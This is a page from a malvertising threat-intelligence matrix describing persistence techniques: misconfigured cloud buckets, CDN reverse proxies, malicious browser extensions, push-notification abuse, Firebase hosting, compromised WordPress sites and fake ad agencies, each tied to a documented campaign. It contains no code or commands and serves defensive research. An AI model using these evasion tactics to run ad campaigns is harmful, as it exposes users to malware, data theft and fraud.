Malvertising Attack Matrix

A project by


[C300] Persistence

Tactic Description: Persistence is the step where Malvertisers persists within the ad echosystem making sure their campaigns can last the longest time possible while evading detection mechanisms. This could be achieved by using reputable cloud storage services, backend as a services, or CDNs enabling the attackers to persist and keep low profile.

[C301] Cloud Storage - Bucket

Technique Description: Buckets are cloud containers that stores user data. Often used to store and protect any amount of data for websites, mobiles apps for backup and restore. Cloud Storage Buckets is a technique were malvertisers hosts their malicious script in malconfigured Buckets of cloud services with very good reputation allowing to execute malicious script and persist in malveritisng chains of redirections why bypassing domain-reputation based scanners at the same time.

Procedure example: Malvertiser "ScamClub" Bypasses Iframe Sandboxing, hosting malicious script in amazon S3.

References [Confiant] scamclub bypasses iframe sandboxing:

[C302] CDN reverse proxies

Technique Description: A reverse proxy is a server that sits in front of web servers and forwards client (e.g. web browser) requests to those web servers. Reverse proxies are typically implemented to help increase security, performance, and reliability. Some reputable and trusted CDNs offers reverse proxies. In general the network traffic going to the reverse proxied web servers, is encrypted, and often trusted/authorized thanks to the CDN domain reputation. Malvertisers are using CDN reverse proxies, to hide their traffic, enabling them to continously persist in the redirect chain while staying under the radar.

Procedure example: Egobbler using One-time commercial CDNs as reverse proxies (namely Rackspace and Fastly).

References [Confiant] Malvertising made in China:

[C303] Browser Extension

Technique Description: Malicious Browser extensions help attackers to achieve persistence on victim devices by enabling them to sit as a component that has access and visibility into the entirety of the browser's stack. This allows the attacker to circumvent browser security policies like CORS and carry out further attacks automatically like credential theft or ad stuffing.

Procedure example: A Chrome extension creators had specifically made extensions that obfuscated the underlying advertising functionality from users. This was done in order to connect the browser clients to a command and control architecture, exfiltrate private browsing data without the users knowledge, expose the user to risk of exploit through advertising streams, and attempt to evade the Chrome Web Store's fraud detection mechanisms.

References [Duo] Security Researchers Partner With Chrome To Take Down Browser Extension Fraud Network Affecting Millions of Users:

[C304] Browser Notifications

Technique Description: Browser Notifications and Push Notifications in particular are used by apps to send notices to subscribed users. These are often used by bad actors to inflate site traffic for ad fraud purposes, but they play a role in malvertising as well considering that many bad actors attempt to maximize the output of their activity by combining tactics. For example, a malicious landing page might try and force a user to subscribe to push notifications at the same time that it initiates a drive by download in order to continue monetizing the victim in a persistent way.

Procedure example: The Browser-notification[.]site site displayed a "Confirm notifications" message, asking visitors to subscribe to notifications from this site. upon subscription users will start getting unwanted pop-up ads from even when the browser is closed.

References [malwaretips] Browser push notification abuse:

[C305] BackEnd as A Service

Technique Description: Backend as a Service, for example Firebase allows developers to create embeddable scripts and web applications that are hosted on google infrastructure. Some attackers might choose to have portions of their payload delivery flow hosted as a Firebase in order to piggy back off of the reputation that comes along with a Google endpoint.

Procedure example: shlayer purveyor verymal renounces steganography in favor of google firebase as malvertisers shift

References [Confiant] Verymal used Firebase as as malvertisers shift:

[C306] Compromised websites

Technique Description: Compromised websites can be used to host malicious javascript code, that will be executed during malveritising redirect chains. Threat actors will use 0-day/n-days vulnerabilities to target a compromised website and host their malicious code in a persisting way.

Procedure example: A threat actor injecting a malicious JavaScript that redirects visitors and takes advantage of an administrator’s session to insert a backdoor into the wordpress theme's header. This was done by exploiting multiple wordpress vulnerabilities, and allowed the threat actor to redirect visitors to malvertising sites.

References [WordFence] Nearly a Million WP Sites Targeted in Large-Scale Attacks:

[C307] Fake Advertising Agency

Technique Description: Fake Advertising Agency is an advertising agency that is owned by malicious operator for the purpose of establishing relationships with ad buying platforms (DSPs). The agency will usually claim to have relationships with real brands, but these relationships are typically fabricated.

Procedure example: Zirconium group successfully created and operated 28 fake ad agencies to distribute malvertising campaigns through 2017, buying an estimate of 1 billion ad views throughout the year, and reaching 62% of ad-monetized websites on a weekly basis.

References [Confiant] Uncovering 2017's largest malvertising operation: